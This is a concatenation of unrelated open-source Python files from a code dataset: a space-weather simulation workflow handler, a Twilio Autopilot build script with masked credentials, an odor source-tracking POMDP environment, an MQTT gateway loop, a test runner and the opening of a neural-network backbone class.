workflow.send(queue=\"iPIC3D_2D_B0z0_039\", message=msg)\n\n    msg['SimulationCase'] = '2D_B0z0.00975'\n    msg['ParaViewAddress'] = pv_address\n    msg['ParaViewPort'] = 22226\n    workflow.send(queue=\"iPIC3D_2D_B0z0_00975\", message=msg)\n\n    msg['SimulationCase'] = '2D_B0z0.0195'\n    msg['ParaViewAddress'] = pv_address\n    msg['ParaViewPort'] = 22224\n    workflow.send(queue=\"iPIC3D_2D_B0z0_0195\", message=msg)\n\n    msg['SimulationCase'] = '2D_B0z0.0'\n    msg['ParaViewAddress'] = pv_address\n    msg['ParaViewPort'] = 22222\n    workflow.send(queue=\"iPIC3D_2D_B0z0_0\", message=msg)\n\n# space weather shutdown\n@workflow.handler\ndef spaceweather_postprocess(msg):\n\n    IncidentID = msg[\"IncidentID\"]\n    originator = msg['originator']\n    logs = workflow.Persist.Get(IncidentID)\n    print(\"\\nSpaceweather simulation postprocess handler\", IncidentID)\n\n    if originator == 'Simulation Completed':\n        simulationId = msg[\"simulationId\"]\n        simulationIdPostfix=simulationId.split(\"-\")[-1]\n        directoryListing=msg[\"directoryListing\"]\n\n        print(\"\\nResults available for spaceweather simulation!\") \n\n        with pny.db_session:\n            myincident = Incident[IncidentID]\n            simulation=Simulation[simulationId]\n            machine_name=simulation.machine.machine_name\n            machine_basedir=simulation.machine.base_work_dir\n            if machine_basedir[-1] != \"/\": machine_basedir+=\"/\"\n\n            if simulation is not None:\n                result_files={}\n                for entry in directoryListing:\n                    # '193993425 96 -rw-rw-r-- 1 vestec vestec 97574 Nov 28 15:48 incident-bb97271000f5/simulation-a350bba3ee36/output_log.txt'\n                    tokens=entry.split()\n                    if len(tokens) == 11 and \"data\" in tokens[-1]:\n                        result_files[tokens[-1]]=int(tokens[6])\n\n                data_uuids = []\n                for filepath, filesize in result_files.items():\n                    filename = os.path.basename(filepath)\n                    directory = os.path.dirname(filepath)\n                    print(filename, directory, filesize)\n\n                    # register output data with data manager\n                    try:\n                        
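# (note) the commented-out branches below are earlier per-format registration paths;\n                        # only the cycle-2500 .vtk field files are registered by the active branch further down\n                        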
#if \".vtu\" in filename:\n                        #    data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweather simulation (\"+simulation.kind+\")\",\n                        #            \"application/xml\", filesize, \"vtu\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n                        #            kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n                        #elif \".ttk\" in filename:\n                        #    data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweather simulation (\"+simulation.kind+\")\",\n                        #            \"application/octet-stream\", filesize, \"ttk\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n                        #            kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n                        #    data_uuids.append(data_uuid)\n                        #elif \".csv\" in filename:\n                        #    data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweather simulation (\"+simulation.kind+\")\",\n                        #            \"text/csv\", filesize, \"csv\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n                        #            kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n                        #    data_uuids.append(data_uuid)\n                        if \".vtk\" in filename and (\"B\" in filename or \"E\" in filename or \"rho\" in filename or \"J\" in filename) and '2500' in filename:\n                            data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweather simulation (\"+simulation.kind+\")\",\n                                \"application/octet-stream\", filesize, \"vtk\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n                                kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n                            data_uuids.append(data_uuid)\n\n                    except DataManagerException as err:\n                        print(\"Error registering spaceweather base result data with data manager, aborting \"+err.message)\n\n\n        workflow.Persist.Put(IncidentID, {'type': 'postprocessed'})\n        logs = workflow.Persist.Get(IncidentID)\n        print(logs)\n        \n        completed = 0\n        for log in logs:\n            if 'type' in log and log['type'] == 'postprocessed':\n                completed = completed + 1\n\n        if completed >= 4:\n            print('All simulations completed')\n            workflow.send(queue='spaceweather_shutdown', message=msg)\n    else:\n        print(\"Ignore originator with \"+originator)\n        return\n\n#@workflow.handler\n#def spaceweather_postprocess(msg):\n#    IncidentID = msg[\"IncidentID\"]\n#    originator = msg[\"originator\"]\n#\n#    if originator == 'Simulation Completed':\n#        workflow.Persist.Put(IncidentID, {'type': 'postprocessed'})\n#        logs = workflow.Persist.Get(IncidentID)\n#        print(logs)\n#\n#        completed = 0\n#        if len(logs) >= 3:\n#            for log in logs:\n#                if 'type' in log and log['type'] == 'postprocessed':\n#                    completed = completed + 1\n#\n#        if completed >= 3:\n#            print('All simulations completed')\n#            workflow.send(queue='spaceweather_shutdown', message=msg)\n#    else:\n#        workflow.Persist.Put(IncidentID, { 'originator': originator })\n\n####\n    #workflow.Persist.Put(IncidentID, {\"type\": \"postprocessed\", \"originator\": CaseName})\n    #logs = workflow.Persist.Get(IncidentID)\n    #print(logs)\n\n    #_2Dxy = False\n    #_2DxyGuideCase1 = False\n    #_2DxyGuideCase2 = False\n\n    #for log in logs:\n    #    if \"type\" in log and log[\"processed\"] == \"shutdown\":\n    #        if log[\"originator\"] == \"spaceweather_base_simulation\" : _2Dxy=True\n    #        if log[\"originator\"] == \"spaceweather_GuideCase1_simulation\": _2DxyGuideCase1=True\n    #        if log[\"originator\"] == \"spaceweather_GuideCase2_simulation\": _2DxyGuideCase2=True\n\n    #if _2Dxy is True and _2DxyGuideCase1 is True and _2DxyGuideCase2 is True:\n    #    print('Complete incident', IncidentID)\n    
# workflow.send(queue=\"spaceweather_shutdown\", message=msg)\n\n@workflow.handler\ndef spaceweather_shutdown(msg):\n print(\"\\nSpaceweather simulation shutdown handler\")\n IncidentID = msg[\"IncidentID\"]\n workflow.Complete(IncidentID)\n\n# we have to register them with the workflow system\ndef RegisterHandlers():\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_0, queue=\"iPIC3D_2D_B0z0_0\")\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_0195, queue=\"iPIC3D_2D_B0z0_0195\")\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_00975, queue=\"iPIC3D_2D_B0z0_00975\")\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_039, queue=\"iPIC3D_2D_B0z0_039\")\n workflow.RegisterHandler(handler=spaceweather_init, queue=\"spaceweather_init\")\n workflow.RegisterHandler(handler=spaceweather_postprocess, queue=\"spaceweather_postprocess\")\n workflow.RegisterHandler(handler=spaceweather_shutdown, queue=\"spaceweather_shutdown\")","repo_name":"VESTEC-EU/vestec-system","sub_path":"WorkflowManager/workflows/spaceweather/spaceweather.py","file_name":"spaceweather.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37408983471","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nfrom twilio.rest import Client\n\n\n# Your Account Sid and Auth Token from twilio.com/console\naccount_sid = 'AC9xxxxxxxxxxxxxxxxxxxxxxxxxxxx99'\nauth_token = '64xxxxxxxxxxxxxxxxxxxxxxxxxxx8'\nclient = Client(account_sid, auth_token)\n\nmodel_build = client.autopilot \\\n .assistants('UAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa') \\\n .model_builds \\\n .create(unique_name='v0.5')\n\nprint(model_build.sid)\n","repo_name":"leewalter/coding","sub_path":"python/Twilio/AutoPilot/build_training_model.py","file_name":"build_training_model.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13501740344","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Provides the SourceTracking class, to simulate the source-tracking POMDP.\"\"\"\n\nimport numpy as np\nimport warnings\nfrom copy import deepcopy\nfrom scipy.special import kv\nfrom scipy.special import kn\nfrom scipy.special import gamma as Gamma\nfrom scipy.stats import poisson as Poisson_distribution\n\n# _____________________ parameters _____________________\nEPSILON = 1e-10\n# ________________________________________________________\n\n\nclass SourceTracking:\n \"\"\"Environment used to simulate the source-tracking POMDP.\n\n Args:\n Ndim (int):\n number of space dimensions (1D, 2D...)\n lambda_over_dx (float):\n dimensionless problem size (odor dispersion lengthscale divided by agent step size)\n R_dt (float):\n dimensionless source intensity (source rate of emission multiplied by the agent time step)\n norm_Poisson ('Euclidean', 'Manhattan' or 'Chebyshev', optional):\n norm used for hit detections (default='Euclidean')\n Ngrid (int or None, optional):\n linear size of the domain, set automatically if None (default=None)\n Nhits (int or None, optional):\n number of possible hit values, set automatically if None (default=None)\n draw_source (bool, optional):\n whether to actually draw the source location (otherwise uses Bayesian framework) (default=False)\n initial_hit (int or None, optional):\n value of the initial hit, if None drawn randomly according to relevant probability distribution (default=None)\n dummy (bool, optional):\n set 
automatic parameters (e.g., Ngrid) but does not initialize the POMDP (default=False)\n\n    Attributes:\n        Ndim (int):\n            number of dimensions of space (1D, 2D...)\n        lambda_over_dx (float):\n            dimensionless problem size (odor dispersion lengthscale divided by agent step size)\n        R_dt (float):\n            dimensionless source intensity (source rate of emission multiplied by the agent time step)\n        norm_Poisson (str):\n            norm used for hit detections: 'Euclidean', 'Manhattan' or 'Chebyshev'\n        Ngrid (int):\n            linear size of the domain\n        Nhits (int):\n            number of possible hit values\n        draw_source (bool):\n            whether a source location is actually drawn (otherwise uses Bayesian framework)\n        initial_hit (int):\n            value of the initial hit\n        Nactions (int):\n            number of possible actions\n        NN_input_shape (tuple(int)):\n            shape of the input array for neural network models\n        mu0_Poisson (float):\n            mean number of hits at a distance lambda_over_dx from the source\n        agent (list(int)):\n            current agent location\n        p_source (ndarray):\n            current probability distribution of the source location\n        obs (dict):\n            current observation (\"hit\" and \"done\")\n        hit_map (ndarray):\n            number of hits received for each location (-1 for cells not visited yet)\n        cumulative_hits (int):\n            cumulative sum of hits received (ignoring initial hit)\n        agent_near_boundaries (bool):\n            whether the agent is currently near a boundary\n        agent_stuck (bool):\n            whether the agent is currently stuck in an \"infinite\" loop\n\n    \"\"\"\n\n    def __init__(\n        self,\n        Ndim,\n        lambda_over_dx,\n        R_dt,\n        norm_Poisson='Euclidean',\n        Ngrid=None,\n        Nhits=None,\n        draw_source=False,\n        initial_hit=None,\n        dummy=False,\n    ):\n\n        self.Ndim = int(Ndim)\n        if self.Ndim < 1:\n            raise Exception(\"Ndim must be a positive integer\")\n\n        self.lambda_over_dx = lambda_over_dx\n        self.R_dt = R_dt\n        if self.lambda_over_dx < 1.0 or self.R_dt <= 0.0:\n            raise Exception(\"lambda_over_dx must be >= 1.0 and R_dt must be > 0.0\")\n\n        self.norm_Poisson = norm_Poisson\n        if not (self.norm_Poisson in ('Euclidean', 'Manhattan', 'Chebyshev')):\n            raise Exception(\"norm_Poisson must be 'Euclidean', 'Manhattan' or 'Chebyshev'\")\n\n        self._set_mu0_Poisson()\n\n        if Nhits is None:\n            self.Nhits = self._autoset_Nhits()\n        else:\n            self.Nhits = int(Nhits)\n            if self.Nhits < 2:\n                raise Exception(\"Nhits must be at least 2\")\n\n        if Ngrid is None:\n            self.N = self._autoset_Ngrid()\n        else:\n            self.N = int((Ngrid // 2) * 2 + 1)  # make it odd\n            if self.N < 3:\n                raise Exception(\"Ngrid must be at least 3\")\n\n        self.draw_source = draw_source\n        if not isinstance(self.draw_source, bool):\n            raise Exception(\"draw_source must be a bool\")\n\n        self.Nactions = 2 * self.Ndim\n\n        self.NN_input_shape = tuple([2 * self.N - 1] * self.Ndim)\n\n        if not dummy:\n            self.restart(initial_hit)\n\n    def restart(self, initial_hit=None):\n        \"\"\"Restart the search.\n\n        Args:\n            initial_hit (int or None): initial hit, if None then random\n        \"\"\"\n        if initial_hit is None:\n            self.initial_hit = self._initial_hit()\n        else:\n            self.initial_hit = int(initial_hit)\n            if self.initial_hit > self.Nhits - 1:\n                raise Exception(\"initial_hit cannot be > Nhits - 1\")\n\n        self.hit_map = -np.ones([self.N] * self.Ndim, dtype=int)\n        self.agent = [self.N // 2] * self.Ndim\n        self._init_distributed_source()\n        if self.draw_source:\n            self._draw_a_source()\n\n        self.cumulative_hits = 0\n        self.agent_near_boundaries = 0\n        self.agent_stuck = False\n        self.obs = {\"hit\": self.initial_hit, \"done\": False}\n\n        self._agento = [0] * self.Ndim  # position 1 step ago (arbitrary init value)\n        
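# (added) together with _agentoo below, this keeps the previous two positions so that\n        # _is_agent_stuck() can detect back-and-forth loops\n        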
self._agentoo = [self.N] * self.Ndim # position 2 steps ago (arbitrary init value)\n self._repeated_visits = 0 # to detect back and forth motion\n\n def step(self, action, hit=None, quiet=False):\n \"\"\"\n Make a step in the source-tracking environment:\n\n 1. The agent moves to its new position according to `action`,\n 2. The agent receives a hit or the source is found,\n 3. The belief (self.p_source) and the hit map (self.hit_map) are updated.\n\n Args:\n action (int): action of the agent\n hit (int, optional): prescribed number of hits,\n if None (default) the number of hits is chosen randomly according to its probability\n quiet (bool, optional): whether to print when agent is attempting a forbidden move (default=False)\n\n Returns:\n hit (int): number of hits received\n p_end (float): probability of having found the source (relevant only if not draw_source)\n done (bool): whether the source has been found (relevant only if draw_source)\n\n \"\"\"\n hit, p_end, done = self._execute_action(action, hit, quiet)\n self._update_after_hit(hit, done)\n\n return hit, p_end, done\n\n # __ POMDP UPDATES _______________________________________\n def _execute_action(self, action, hit=None, quiet=False):\n self._agentoo = self._agento\n self._agento = self.agent\n\n # move agent\n self.agent, is_move_possible = self._move(action, self.agent)\n if (not is_move_possible) and (not quiet):\n print(\"This move is not possible: agent =\", self.agent, \"cannot do action =\", action)\n self.agent_near_boundaries = self._is_agent_near_boundaries(n_boundary=1)\n self.agent_stuck = self._is_agent_stuck()\n\n if self.draw_source:\n if self.norm_Poisson == 'Manhattan':\n ord = 1\n elif self.norm_Poisson == 'Euclidean':\n ord = 2\n elif self.norm_Poisson == 'Chebyshev':\n ord = float(\"inf\")\n else:\n raise Exception(\"This norm is not implemented\")\n d = np.linalg.norm(np.asarray(self.agent) - np.asarray(self.source), ord=ord)\n\n if d > EPSILON:\n done = False\n p_end = 0\n\n # Picking randomly the number of hits\n mu = self._mean_number_of_hits(d)\n probability = np.zeros(self.Nhits)\n sum_proba = 0\n for h in range(self.Nhits - 1):\n probability[h] = self._Poisson(mu, h)\n sum_proba += self._Poisson(mu, h)\n probability[self.Nhits - 1] = np.maximum(0, 1.0 - sum_proba)\n if hit is None:\n hit = np.random.RandomState().choice(\n range(self.Nhits), p=probability\n )\n else:\n done = True\n p_end = 1\n hit = -2\n\n else:\n done = False\n\n p_end = self.p_source[tuple(self.agent)]\n if p_end > 1 - EPSILON:\n done = True\n\n # Source not in self.agent\n new_p_source = deepcopy(self.p_source)\n new_p_source[tuple(self.agent)] = 0.0\n if np.sum(new_p_source) > EPSILON:\n new_p_source /= np.sum(new_p_source)\n else:\n done = True\n\n if not done:\n # extracting the evidence matrix for Bayesian inference\n p_evidence = self._extract_N_from_2N(input=self.p_Poisson, origin=self.agent)\n\n # Compute hit proba\n p_hit_table = np.zeros(self.Nhits)\n for h in range(self.Nhits):\n p_hit_table[h] = np.maximum(\n 0,\n np.sum(new_p_source * p_evidence[h])\n )\n sum_p_hit = np.sum(p_hit_table)\n if np.abs(sum_p_hit - 1.0) < EPSILON:\n p_hit_table /= sum_p_hit\n else:\n print(\"sum_p_hit_table = \", sum_p_hit)\n raise Exception(\"p_hit_table does not sum to 1\")\n\n # Picking randomly the number of hits\n if hit is None:\n hit = np.random.RandomState().choice(range(self.Nhits), p=p_hit_table)\n\n else:\n hit = -2\n\n if not done:\n self.cumulative_hits += hit\n\n return hit, p_end, done\n \n def _update_after_hit(self, hit, 
done=None):\n \"\"\"Update of the hit_map and p_source when receiving hits.\n\n Args:\n hit (int): number of hits received\n done (bool): whether the unique source is found\n \"\"\"\n if hit is not None:\n self._update_hit_map(hit)\n self._update_obs(hit, done)\n self._update_p_source(hit, done)\n \n def _update_hit_map(self, hit=0):\n self.hit_map[tuple(self.agent)] = hit\n\n def _update_obs(self, hit, done):\n self.obs[\"hit\"] = hit\n self.obs[\"done\"] = done\n\n def _update_p_source(self, hit=0, done=None):\n if done:\n self.p_source = np.zeros([self.N] * self.Ndim)\n self.p_source[tuple(self.agent)] = 1.0\n self.entropy = 0.0\n else:\n self.p_source[tuple(self.agent)] = 0\n p_evidence = self._extract_N_from_2N(input=self.p_Poisson, origin=self.agent)\n self.p_source *= p_evidence[hit]\n self.p_source[(self.p_source < 0.0) & (self.p_source > -1e-15)] = 0.0\n\n if np.sum(self.p_source) > EPSILON:\n self.p_source /= np.sum(self.p_source)\n self.entropy = self._entropy(self.p_source)\n\n def _move(self, action, agent):\n \"\"\"Move the agent according to action.\n\n Args:\n action (int): action chosen\n agent (list of int): position of the agent\n\n Returns:\n new_agent (list of int): new position of the agent\n is_move_possible (bool): whether the action was allowed\n\n \"\"\"\n is_move_possible = True\n new_agent = deepcopy(agent)\n axis = action // 2\n if axis < self.Ndim:\n direction = 2 * (action % 2) - 1\n if direction == -1:\n if agent[axis] > 0:\n new_agent[axis] -= 1\n else:\n is_move_possible = False\n elif direction == 1:\n if agent[axis] < self.N - 1:\n new_agent[axis] += 1\n else:\n is_move_possible = False\n else:\n raise Exception(\"This action is outside the allowed range\")\n\n return new_agent, is_move_possible\n \n # __ HIT DETECTION _______________________________________\n def _mean_number_of_hits(self, distance):\n distance = np.array(distance)\n distance[distance == 0] = 1.0\n if self.Ndim == 1:\n mu = np.exp(-distance / self.lambda_over_dx + 1)\n elif self.Ndim == 2:\n mu = kn(0, distance / self.lambda_over_dx) / kn(0, 1)\n elif self.Ndim == 3:\n mu = self.lambda_over_dx / distance * np.exp(-distance / self.lambda_over_dx + 1)\n elif self.Ndim > 3:\n mu = (self.lambda_over_dx / distance) ** (self.Ndim / 2 - 1) \\\n * kv(self.Ndim / 2 - 1, distance / self.lambda_over_dx) \\\n / kv(self.Ndim / 2 - 1, 1)\n else:\n raise Exception(\"Problem with the number of dimensions\")\n mu *= self.mu0_Poisson\n return mu\n\n def _Poisson_unbounded(self, mu, h):\n p = Poisson_distribution(mu).pmf(h)\n return p\n\n def _Poisson(self, mu, h):\n if h < self.Nhits - 1: # = Poisson(mu,hit=h)\n p = self._Poisson_unbounded(mu, h)\n elif h == self.Nhits - 1: # = Poisson(mu,hit>=h)\n sum = 0.0\n for k in range(h):\n sum += self._Poisson_unbounded(mu, k)\n p = 1 - sum\n else:\n raise Exception(\"h cannot be > Nhits - 1\")\n return p\n \n def _compute_p_Poisson(self):\n size = 1 + 2 * self.N # note: this could be reduced to size 2N - 1\n origin = [self.N] * self.Ndim\n d = self._distance(N=size, origin=origin, norm=self.norm_Poisson)\n mu = self._mean_number_of_hits(d)\n mu[tuple(origin)] = 0.0\n\n self.p_Poisson = np.zeros([self.Nhits] + [size] * self.Ndim)\n sum_proba = np.zeros([size] * self.Ndim)\n for h in range(self.Nhits):\n self.p_Poisson[h] = self._Poisson(mu, h)\n sum_proba += self.p_Poisson[h]\n if h < self.Nhits - 1:\n sum_is_one = np.all(abs(sum_proba - 1) < EPSILON)\n if sum_is_one:\n raise Exception(str('Nhits is too large, reduce it to Nhits = ' + str(h + 1)\n + ' or lower 
(higher values have zero probabilities)'))\n\n if not np.all(sum_proba == 1.0):\n raise Exception(\"_compute_p_Poisson: sum proba is not 1\")\n\n # by definition: p_Poisson(origin) = 0\n for h in range(self.Nhits):\n self.p_Poisson[tuple([h] + origin)] = 0.0\n \n # __ INITIALIZATION AND AUTOSET _______________________________________\n def _init_distributed_source(self, ):\n if not hasattr(self, 'p_Poisson'):\n self._compute_p_Poisson()\n self.p_source = np.ones([self.N] * self.Ndim) / (self.N ** self.Ndim - 1)\n self.p_source[tuple([self.N // 2] * self.Ndim)] = 0.0\n self._update_p_source(hit=self.initial_hit)\n self._update_hit_map(hit=self.initial_hit)\n\n def _draw_a_source(self):\n prob = self.p_source.flatten()\n index = np.random.RandomState().choice(self.N**self.Ndim, size=1, p=prob)[0]\n self.source = np.unravel_index(index, shape=([self.N] * self.Ndim))\n self.source = np.array(self.source, dtype=int)\n\n def _initial_hit(self, hit=None):\n if hit is None:\n p_hit_table = np.zeros(self.Nhits)\n r = np.arange(1, int(1000 * self.lambda_over_dx))\n shell_volume = self._volume_ball(r+0.5) - self._volume_ball(r-0.5)\n for h in range(1, self.Nhits):\n p = self._Poisson(self._mean_number_of_hits(r), h) # proba hit=h as a function of distance r to the source\n p_hit_table[h] = max(0, np.sum(p * shell_volume)) # not normalized\n p_hit_table /= np.sum(p_hit_table)\n hit = np.random.RandomState().choice(range(self.Nhits), p=p_hit_table)\n return hit\n \n def _autoset_Ngrid(self, p_source_out=1e-3):\n # return the smallest Ngrid such that, for a virtually infinite domain, the probability of the source\n # being outside a ball of diameter Ngrid is less than p_source_out after any initial hit\n r = np.arange(1, int(1000 * self.lambda_over_dx))\n shell_volume = self._volume_ball(r + 0.5) - self._volume_ball(r - 0.5)\n Ngrid = 0\n hit_list = range(1, self.Nhits)\n for hit in hit_list:\n p = self._Poisson(self._mean_number_of_hits(r), hit) # proba hit=h as a function of distance r to the source\n pball = np.cumsum(p * shell_volume)\n pball /= pball[-1] # proba source is in the ball as a function of ball radius r\n where = np.argwhere(1 - pball < p_source_out)[0, 0]\n Ngrid = max(Ngrid, 2 * (where + 1) + 1)\n return int(Ngrid)\n\n def _autoset_Nhits(self):\n mu_at_dx = self._mean_number_of_hits(1.0)\n h = mu_at_dx + np.sqrt(mu_at_dx)\n return int(np.ceil(h)) + 1\n \n # __ LOW LEVEL UTILITIES _______________________________________\n def _entropy(self, array, axes=None):\n log2 = np.zeros(array.shape)\n indices = array > EPSILON\n log2[indices] = -np.log2(array[indices])\n return np.sum(array * log2, axis=axes)\n\n def _distance(self, Ndim=None, N=None, origin=None, norm='Euclidean'):\n if Ndim is None:\n Ndim = self.Ndim\n if N is None:\n N = self.N\n if origin is None:\n origin = self.agent\n if len(origin) != Ndim:\n print(origin)\n raise Exception(\"The origin coordinates are not consistent with the number of dimensions\")\n\n coord = np.mgrid[tuple([range(N)] * Ndim)]\n for i in range(Ndim):\n coord[i] -= origin[i]\n d = np.zeros([N] * Ndim)\n if norm == 'Manhattan':\n for i in range(Ndim):\n d += np.abs(coord[i])\n return d\n elif norm == 'Euclidean':\n for i in range(Ndim):\n d += (coord[i]) ** 2\n d = np.sqrt(d)\n return d\n elif norm == 'Chebyshev':\n d = np.amax(np.abs(coord), axis=0)\n return d\n else:\n raise Exception(\"This norm is not implemented\")\n\n def _volume_ball(self, r, Ndim=None, norm=None):\n if Ndim is None:\n Ndim = self.Ndim\n if norm is None:\n norm = 
self.norm_Poisson\n if norm == 'Manhattan':\n pm1 = 1\n elif norm == 'Euclidean':\n pm1 = 1 / 2\n elif norm == 'Chebyshev':\n pm1 = 0\n else:\n raise Exception(\"This norm is not implemented\")\n return (2 * Gamma(pm1 + 1) * r) ** Ndim / Gamma(Ndim * pm1 + 1)\n\n def _is_agent_near_boundaries(self, n_boundary):\n # is the agent within n_boundary cell(s) of a boundary of the computational domain?\n for axis in range(self.Ndim):\n if (self.agent[axis] >= self.N - 1 - n_boundary) or (\n self.agent[axis] <= n_boundary\n ):\n return 1\n return 0\n\n def _is_agent_stuck(self):\n agent_stuck = False\n if self._agentoo == self.agent:\n self._repeated_visits += 1\n else:\n self._repeated_visits = 0\n if self._repeated_visits > 8:\n agent_stuck = True\n return agent_stuck\n\n def _set_mu0_Poisson(self, ):\n \"\"\"Sets the value of mu0_Poisson (mean number of hits at distance = lambda), which is derived from the\n physical dimensionless parameters of the problem. It is required by _mean_number_of_hits().\n \"\"\"\n dx_over_a = 2.0 # agent step size / agent radius\n lambda_over_a = self.lambda_over_dx * dx_over_a\n a_over_lambda = 1.0 / lambda_over_a\n\n if self.Ndim == 1:\n mu0_Poisson = 1 / (1 - a_over_lambda) * np.exp(-1)\n elif self.Ndim == 2:\n mu0_Poisson = 1 / np.log(lambda_over_a) * kn(0, 1)\n elif self.Ndim == 3:\n mu0_Poisson = a_over_lambda * np.exp(-1)\n elif self.Ndim > 3:\n mu0_Poisson = (self.Ndim - 2) / Gamma(self.Ndim / 2) / (2 ** (self.Ndim / 2 - 1)) * \\\n a_over_lambda ** (self.Ndim - 2) * kv(self.Ndim / 2 - 1, 1)\n else:\n raise Exception(\"problem with Ndim\")\n\n mu0_Poisson *= self.R_dt\n self.mu0_Poisson = mu0_Poisson\n\n def _extract_N_from_2N(self, input, origin):\n if len(origin) != self.Ndim:\n raise Exception(\"_extract_N_from_2N: len(origin) is different from Ndim\")\n if input.shape[-1] == 2 * self.N + 1:\n index = np.array([self.N] * self.Ndim) - origin\n elif input.shape[-1] == 2 * self.N - 1:\n index = np.array([self.N - 1] * self.Ndim) - origin\n else:\n raise Exception(\"_extract_N_from_2N(): dimension of input must be 2N-1 or 2N+1\")\n if self.Ndim == 1:\n output = input[..., index[0]:index[0] + self.N]\n elif self.Ndim == 2:\n output = input[...,\n index[0]:index[0] + self.N,\n index[1]:index[1] + self.N]\n elif self.Ndim == 3:\n output = input[...,\n index[0]:index[0] + self.N,\n index[1]:index[1] + self.N,\n index[2]:index[2] + self.N]\n elif self.Ndim == 4:\n output = input[...,\n index[0]:index[0] + self.N,\n index[1]:index[1] + self.N,\n index[2]:index[2] + self.N,\n index[3]:index[3] + self.N]\n else:\n raise Exception(\"_extract_N_from_2N() not implemented for Ndim > 4\")\n return output\n\n # __ INPUT TO VALUE FUNCTION _______________________________________\n def _centeragent(self, p, agent):\n \"\"\"Return the probability density of the source centered on the agent\n\n Args:\n p (numpy array): initial probability in a non-centered environment\n agent (list): vector position of the agent\n\n Returns:\n numpy array: probability density centered on the agent (tensor of size (2 * N - 1) ** Ndim)\n \"\"\"\n result = np.zeros([2 * self.N - 1] * self.Ndim)\n if self.Ndim == 1:\n result[self.N - 1 - agent[0]:2 * self.N - 1 - agent[0]] = p\n elif self.Ndim == 2:\n result[\n self.N - 1 - agent[0]:2 * self.N - 1 - agent[0],\n self.N - 1 - agent[1]:2 * self.N - 1 - agent[1],\n ] = p\n elif self.Ndim == 3:\n result[\n self.N - 1 - agent[0]:2 * self.N - 1 - agent[0],\n self.N - 1 - agent[1]:2 * self.N - 1 - agent[1],\n self.N - 1 - agent[2]:2 * self.N - 1 - 
agent[2],\n ] = p\n else:\n raise Exception(\"_centeragent is not implemented for Ndim > 3\")\n\n return result\n","repo_name":"C0PEP0D/otto","sub_path":"otto/classes/sourcetracking.py","file_name":"sourcetracking.py","file_ext":"py","file_size_in_byte":23646,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"31747144097","text":"import config\nfrom Logger import Logger\nfrom Mqtt import Mqtt\nfrom daikinapi import Daikin\nimport time\nimport sys\nimport traceback\n\nmqtt = Mqtt()\ndaikin = Daikin()\n\ndef app():\n mqtt.connect()\n mqtt.loop_start()\n\n #mqtt.update_status(config.MQTT_GATEWAY_STATUS_START)\n #mqtt.publish(config.MQTT_GATEWAY_ERROR_CMD, \"\")\n\n while True:\n time.sleep(0.1)\n\n #mqtt.update_status(config.MQTT_GATEWAY_STATUS_QUIT)\n mqtt.loop_stop()\n\n\nif __name__ == \"__main__\":\n try:\n app()\n except KeyboardInterrupt:\n Logger().info('Main : Interrupted')\n exit()\n except Exception as e:\n Logger().info(f\"Main : Oops! {str(sys.exc_info())} occured. \\n {traceback.format_exc()}\\n\")\n mqtt.publish_event(config.MQTT_GATEWAY_ERROR_CMD, traceback.format_exc())\n","repo_name":"juliend20/DaikinWifi2Mqtt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23399318275","text":"#!/usr/bin/env python\n# TR\nimport os\nmodules = 'stations events data trace stream rf imaging' #xcorr\nos.chdir('../')\nfor module in modules.split():\n command = 'python %s.py' % module\n print(command + ' ...\\n')\n os.system(command)\n\n","repo_name":"trichter/sito","sub_path":"tests2/other_test_main_in_modules.py","file_name":"other_test_main_in_modules.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"7883183170","text":"import torch.nn as nn\nimport pretrainedmodels \n\nfrom torch.nn.modules.batchnorm import _BatchNorm\n\nfrom ..registry import BACKBONES\n\n@BACKBONES.register_module\nclass SEResNeXt(nn.Module):\n \"\"\"SE-ResNeXt backbone.\n\n Args:\n depth (int): Depth of resnet, from {18, 34, 50, 101, 152}.\n in_channels (int): Number of input image channels. Normally 3.\n num_stages (int): Resnet stages, normally 4.\n strides (Sequence[int]): Strides of the first block of each stage.\n dilations (Sequence[int]): Dilation of each stage.\n out_indices (Sequence[int]): Output from which stages.\n style (str): `pytorch` or `caffe`. If set to \"pytorch\", the stride-two\n layer is the 3x3 conv layer, otherwise the stride-two layer is\n the first 1x1 conv layer.\n frozen_stages (int): Stages to be frozen (stop grad and set eval mode).\n -1 means not freezing any parameters.\n norm_cfg (dict): dictionary to construct and config norm layer.\n norm_eval (bool): Whether to set norm layers to eval mode, namely,\n freeze running stats (mean and var). Note: Effect on Batch Norm\n and its variants only.\n with_cp (bool): Use checkpoint or not. Using checkpoint will save some\n memory while slowing down the training speed.\n zero_init_residual (bool): whether to use zero init for last norm layer\n in resblocks to let them behave as identity.\n\n Example:\n >>> from mmdet.models import ResNet\n >>> import torch\n >>> self = ResNet(depth=18)\n >>> self.eval()\n 